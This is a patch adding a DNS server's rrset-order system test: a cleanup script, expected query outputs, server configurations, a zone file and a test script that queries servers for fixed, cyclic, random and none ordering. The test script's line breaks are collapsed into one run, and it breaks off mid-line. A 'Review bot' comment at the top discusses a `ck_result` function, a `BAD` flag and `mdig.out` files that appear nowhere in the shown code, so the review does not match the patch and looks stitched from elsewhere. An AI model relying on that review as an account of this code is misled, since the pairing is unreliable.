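Review bot: In `ck_result` the `BAD` flag cannot work as written. `range … || setret "…" && BAD=yes` parses as `(range … || setret …) && BAD=yes`, so `BAD=yes` is assigned even when `range` succeeds, and the closing `test -z "$BAD"` is never true because `BAD` starts as `no`. As a result `rm -f mdig.out-$1` is dead code; if the intent was to keep the output only for failing checks, each check should read `range $ADDRS "$3" 1 || { setret "…"; BAD=yes; }` and the guard should be `if test "$BAD" = no; then`. The comment above the function also documents arguments `$1` to `$7`, while the body reads `$8` for the NOERROR count.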
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.test*
+rm -f dig.out.cyclic dig.out.fixed dig.out.random dig.out.nomatch dig.out.none
+rm -f dig.out.0 dig.out.1 dig.out.2 dig.out.3
+rm -f dig.out.cyclic2
+rm -f ns2/root.bk
+rm -f ns?/named.run ns?/named.core
+rm -f */named.memstats
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/rrsetorder/dig.out.fixed.good b/bin/tests/system/rrsetorder/dig.out.fixed.good
new file mode 100644
index 0000000..eaf9c63
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.fixed.good
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.3
+1.2.3.1
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good1 b/bin/tests/system/rrsetorder/dig.out.random.good1
new file mode 100644
index 0000000..c272c75
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good1
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.2
+1.2.3.3
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good10 b/bin/tests/system/rrsetorder/dig.out.random.good10
new file mode 100644
index 0000000..6a39e3f
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good10
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.3
+1.2.3.4
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good11 b/bin/tests/system/rrsetorder/dig.out.random.good11
new file mode 100644
index 0000000..efbc792
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good11
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.4
+1.2.3.1
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good12 b/bin/tests/system/rrsetorder/dig.out.random.good12
new file mode 100644
index 0000000..c859a2e
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good12
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.4
+1.2.3.3
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good13 b/bin/tests/system/rrsetorder/dig.out.random.good13
new file mode 100644
index 0000000..49bf54b
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good13
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.1
+1.2.3.2
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good14 b/bin/tests/system/rrsetorder/dig.out.random.good14
new file mode 100644
index 0000000..974aa89
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good14
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.1
+1.2.3.4
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good15 b/bin/tests/system/rrsetorder/dig.out.random.good15
new file mode 100644
index 0000000..e8deb67
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good15
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.2
+1.2.3.1
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good16 b/bin/tests/system/rrsetorder/dig.out.random.good16
new file mode 100644
index 0000000..f467087
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good16
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.2
+1.2.3.4
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good17 b/bin/tests/system/rrsetorder/dig.out.random.good17
new file mode 100644
index 0000000..6082a25
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good17
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.4
+1.2.3.1
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good18 b/bin/tests/system/rrsetorder/dig.out.random.good18
new file mode 100644
index 0000000..07eefa0
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good18
@@ -0,0 +1,4 @@
+1.2.3.3
+1.2.3.4
+1.2.3.2
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good19 b/bin/tests/system/rrsetorder/dig.out.random.good19
new file mode 100644
index 0000000..a5530c6
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good19
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.1
+1.2.3.2
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good2 b/bin/tests/system/rrsetorder/dig.out.random.good2
new file mode 100644
index 0000000..00da93a
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good2
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.2
+1.2.3.4
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good20 b/bin/tests/system/rrsetorder/dig.out.random.good20
new file mode 100644
index 0000000..6dcf6da
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good20
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.1
+1.2.3.3
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good21 b/bin/tests/system/rrsetorder/dig.out.random.good21
new file mode 100644
index 0000000..9dcc63f
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good21
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.2
+1.2.3.1
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good22 b/bin/tests/system/rrsetorder/dig.out.random.good22
new file mode 100644
index 0000000..4c51aa6
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good22
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.2
+1.2.3.3
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good23 b/bin/tests/system/rrsetorder/dig.out.random.good23
new file mode 100644
index 0000000..eaf9c63
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good23
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.3
+1.2.3.1
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good24 b/bin/tests/system/rrsetorder/dig.out.random.good24
new file mode 100644
index 0000000..c25c756
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good24
@@ -0,0 +1,4 @@
+1.2.3.4
+1.2.3.3
+1.2.3.2
+1.2.3.1
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good3 b/bin/tests/system/rrsetorder/dig.out.random.good3
new file mode 100644
index 0000000..4d50059
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good3
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.3
+1.2.3.2
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good4 b/bin/tests/system/rrsetorder/dig.out.random.good4
new file mode 100644
index 0000000..0b34afa
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good4
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.3
+1.2.3.4
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good5 b/bin/tests/system/rrsetorder/dig.out.random.good5
new file mode 100644
index 0000000..efe0e25
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good5
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.4
+1.2.3.2
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good6 b/bin/tests/system/rrsetorder/dig.out.random.good6
new file mode 100644
index 0000000..d2ca6fc
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good6
@@ -0,0 +1,4 @@
+1.2.3.1
+1.2.3.4
+1.2.3.3
+1.2.3.2
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good7 b/bin/tests/system/rrsetorder/dig.out.random.good7
new file mode 100644
index 0000000..0d8312a
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good7
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.1
+1.2.3.3
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good8 b/bin/tests/system/rrsetorder/dig.out.random.good8
new file mode 100644
index 0000000..3b27693
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good8
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.1
+1.2.3.4
+1.2.3.3
diff --git a/bin/tests/system/rrsetorder/dig.out.random.good9 b/bin/tests/system/rrsetorder/dig.out.random.good9
new file mode 100644
index 0000000..61192af
--- /dev/null
+++ b/bin/tests/system/rrsetorder/dig.out.random.good9
@@ -0,0 +1,4 @@
+1.2.3.2
+1.2.3.3
+1.2.3.1
+1.2.3.4
diff --git a/bin/tests/system/rrsetorder/ns1/named.conf.in b/bin/tests/system/rrsetorder/ns1/named.conf.in
new file mode 100644
index 0000000..98301c2
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns1/named.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify no;
+ rrset-order {
+ name "fixed.example" order fixed;
+ name "random.example" order random;
+ name "cyclic.example" order cyclic;
+ name "none.example" order none;
+ type NS order random;
+ order cyclic;
+ };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+ notify explicit;
+ also-notify { 10.53.0.2; };
+};
diff --git a/bin/tests/system/rrsetorder/ns1/root.db b/bin/tests/system/rrsetorder/ns1/root.db
new file mode 100644
index 0000000..094eec7
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns1/root.db
@@ -0,0 +1,51 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+. SOA hostmaster.isc.org. a.root-servers.nil. (
+ 2000042100
+ 600
+ 600
+ 1200
+ 600 )
+. NS a.root-servers.nil.
+. NS cyclic.example.
+a.root-servers.nil. A 10.53.0.1
+;
+fixed.example. A 1.2.3.4
+fixed.example. A 1.2.3.3
+fixed.example. A 1.2.3.1
+fixed.example. A 1.2.3.2
+;
+random.example. A 1.2.3.1
+random.example. A 1.2.3.2
+random.example. A 1.2.3.3
+random.example. A 1.2.3.4
+;
+cyclic.example. A 1.2.3.4
+cyclic.example. A 1.2.3.3
+cyclic.example. A 1.2.3.2
+cyclic.example. A 1.2.3.1
+;
+cyclic2.example. A 1.2.3.4
+cyclic2.example. A 1.2.3.3
+cyclic2.example. A 1.2.3.2
+cyclic2.example. A 1.2.3.1
+;
+nomatch.example. A 1.2.3.1
+nomatch.example. A 1.2.3.2
+nomatch.example. A 1.2.3.3
+nomatch.example. A 1.2.3.4
+;
+none.example. A 1.2.3.1
+none.example. A 1.2.3.2
+none.example. A 1.2.3.3
+none.example. A 1.2.3.4
diff --git a/bin/tests/system/rrsetorder/ns2/named.conf.in b/bin/tests/system/rrsetorder/ns2/named.conf.in
new file mode 100644
index 0000000..164400a
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns2/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+ rrset-order {
+ name "fixed.example" order fixed;
+ name "random.example" order random;
+ name "cyclic.example" order cyclic;
+ name "none.example" order none;
+ type NS order random;
+ order cyclic;
+ };
+};
+
+zone "." {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "root.bk";
+};
diff --git a/bin/tests/system/rrsetorder/ns3/named.conf.in b/bin/tests/system/rrsetorder/ns3/named.conf.in
new file mode 100644
index 0000000..a5850ca
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns3/named.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ rrset-order {
+ name "fixed.example" order fixed;
+ name "random.example" order random;
+ name "cyclic.example" order cyclic;
+ name "none.example" order none;
+ type NS order random;
+ order cyclic;
+ };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/rrsetorder/ns4/named.conf.in b/bin/tests/system/rrsetorder/ns4/named.conf.in
new file mode 100644
index 0000000..d12f50f
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns4/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ rrset-order {
+ class IN type A name "host.example.com" order random;
+ };
+
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/rrsetorder/ns5/named.conf.in b/bin/tests/system/rrsetorder/ns5/named.conf.in
new file mode 100644
index 0000000..d1a4cfa
--- /dev/null
+++ b/bin/tests/system/rrsetorder/ns5/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/rrsetorder/setup.sh b/bin/tests/system/rrsetorder/setup.sh
new file mode 100644
index 0000000..4b4a4c8
--- /dev/null
+++ b/bin/tests/system/rrsetorder/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
diff --git a/bin/tests/system/rrsetorder/tests.sh b/bin/tests/system/rrsetorder/tests.sh
new file mode 100644
index 0000000..0f5ce8a
--- /dev/null
+++ b/bin/tests/system/rrsetorder/tests.sh
@@ -0,0 +1,553 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+nosea +nocomm +nocmd +noquest +noadd +noauth +nocomm +nostat +short +nocookie" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" + +status=0 + +GOOD_RANDOM="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24" +GOOD_RANDOM_NO=24 + +if grep "^#define DNS_RDATASET_FIXED" $TOP/config.h > /dev/null 2>&1 ; then + test_fixed=true +else + echo_i "Order 'fixed' disabled at compile time" + test_fixed=false +fi + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (primary)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.1 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good >/dev/null || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +else + echo_i "Checking order fixed behaves as cyclic when disabled (primary)" + ret=0 + matches=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 + do + j=$((i % 4)) + $DIGCMD @10.53.0.1 fixed.example > dig.out.fixed || ret=1 + if [ $i -le 4 ]; then + cp dig.out.fixed dig.out.$j + else + $DIFF dig.out.fixed dig.out.$j >/dev/null && matches=$((matches + 1)) + fi + done + $DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 + $DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 + $DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 + $DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 + $DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 + $DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 + if [ $matches -ne 16 ]; then ret=1; fi + if [ $ret != 0 ]; then echo_i 
"failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (primary + additional)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.1 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (primary)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.1 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) +echo_i "Checking order random (primary)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.1 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; 
then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (primary)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.1 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.1 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (secondary)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.2 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (secondary + additional)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi 
+status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (secondary)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order random (secondary)" +ret=0 +for i in $GOOD_RANDOM +do + eval match$i=0 +done +for i in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 9 +do + $DIGCMD @10.53.0.2 random.example > dig.out.random || ret=1 + match=0 + for j in $GOOD_RANDOM + do + eval "$DIFF dig.out.random dig.out.random.good$j >/dev/null && match$j=1 match=1" + if [ $match -eq 1 ]; then break; fi + done + if [ $match -eq 0 ]; then ret=1; fi +done +match=0 +for i in $GOOD_RANDOM +do + eval "match=\$((match + match$i))" +done +echo_i "Random selection return $match of ${GOOD_RANDOM_NO} possible orders in 36 samples" +if [ $match -lt $((GOOD_RANDOM_NO / 3)) ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Checking order none (secondary)" +ret=0 +# Fetch the "reference" response and ensure it contains the expected records. +$DIGCMD @10.53.0.2 none.example > dig.out.none || ret=1 +for i in 1 2 3 4; do + grep -F -q 1.2.3.$i dig.out.none || ret=1 +done +# Ensure 20 further queries result in the same response as the "reference" one. 
+for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + $DIGCMD @10.53.0.2 none.example > dig.out.test$i || ret=1 + $DIFF dig.out.none dig.out.test$i >/dev/null || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "Shutting down secondary" + +stop_server ns2 + +echo_i "Checking for secondary's on disk copy of zone" + +if [ ! -f ns2/root.bk ] +then + echo_i "failed"; + status=$((status + 1)) +fi + +echo_i "Re-starting secondary" + +start_server --noclean --restart --port ${PORT} ns2 + +# +# +# +if $test_fixed; then + echo_i "Checking order fixed (secondary loaded from disk)" + ret=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 + do + $DIGCMD @10.53.0.2 fixed.example > dig.out.fixed || ret=1 + $DIFF dig.out.fixed dig.out.fixed.good || ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +# +# +# +echo_i "Checking order cyclic (secondary + additional, loaded from disk)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic.example > dig.out.cyclic || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic dig.out.$j + else + $DIFF dig.out.cyclic dig.out.$j >/dev/null && matches=$((matches + 1)) + fi +done +$DIFF dig.out.0 dig.out.1 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.0 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.2 >/dev/null && ret=1 +$DIFF dig.out.1 dig.out.3 >/dev/null && ret=1 +$DIFF dig.out.2 dig.out.3 >/dev/null && ret=1 +if [ $matches -ne 16 ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# +# +echo_i "Checking order cyclic (secondary loaded from disk)" +ret=0 +matches=0 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 +do + j=$((i % 4)) + $DIGCMD @10.53.0.2 cyclic2.example > dig.out.cyclic2 || ret=1 + if [ $i -le 4 ]; then + cp dig.out.cyclic2 dig.out.$j + else + $DIFF dig.out.cyclic2 
